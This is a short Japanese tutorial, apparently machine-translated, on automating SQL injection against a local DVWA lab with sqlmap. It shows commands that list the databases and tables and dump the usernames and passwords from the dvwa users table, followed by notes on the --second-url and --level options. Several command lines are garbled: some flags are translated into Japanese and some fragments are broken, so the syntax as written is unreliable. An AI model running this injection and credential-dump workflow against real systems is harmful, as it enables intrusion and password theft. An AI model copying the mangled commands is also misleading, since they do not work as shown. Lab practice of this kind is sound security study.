sqlmap を使用して dvwa のインジェクションを自動化する
dvwa レベルを low に設定します
dvwa の SQL インジェクションを開きます (SQL インジェクション (ブラインド)#) ## )、ブラウザーのデバッグを開き、ユーザー ID を入力して送信し、傍受されたリクエストを表示します。
dvwa セキュリティ レベルを調整するキャプチャしたデータ パケットを .txt ファイルとして保存し、sqlmap ディレクトリに直接 -r ファイル名 --dbs を配置します (後続のパラメータは自分で追加できます)
"http://192.168.1.222:8089/vulnerabilities/sqli/" --バッチ - レベル2 - dbs
#- R 1.txt- -second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" - -batch --level 2 -D dvwa --tables
## - "http://192.168.1.222:8089/vulnerabilities/sqli/"
-- バッチ --レベル 2 -D dvwa -T ユーザー -- columns
フィールド データを展開します
-r 1. txt --second-url " http://192.168.1.222:8089/vulnerabilities/sqli/" --batch --level 2 -D dvwa -T users -C user,password --dump
いくつかの概念的な問題:
##二次注入: Second-order
sql注入-- Second-order インジェクションポイントで入力されたデータが返されるとき、結果が現在のページではなく別のページになる場合があります。このとき、指定する必要があります。どのページで応答を取得し、それが true か false かを判断します。 –second-url の後に、返されたページの URL アドレスが続きます
level:Sqlmap には合計 5 つの検出レベルがあり、デフォルトは 1 です。レベルが高くなるほど、検出中に使用されるペイロードが増えます。このうち、レベル 5 はペイロードが最も多く、Cookie や XFF などのヘッダーを自動的にクラックして挿入します。もちろん、レベルが高くなるほど、検出時間は遅くなります。このパラメータはテストの注入ポイントに影響します。GET データと POST データがテストされます。レベルが 2 の場合、HTTP Cookie がテストされます。レベル 3 の場合、HTTP ユーザー エージェント/リファラー ヘッダーがテストされます。どのパラメータが注入ポイントであるかわからない場合は、精度を確保するためにレベル 5 に設定することをお勧めします (速度も遅くなります)
以上がSqlmap 自動インジェクションのサンプル分析の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。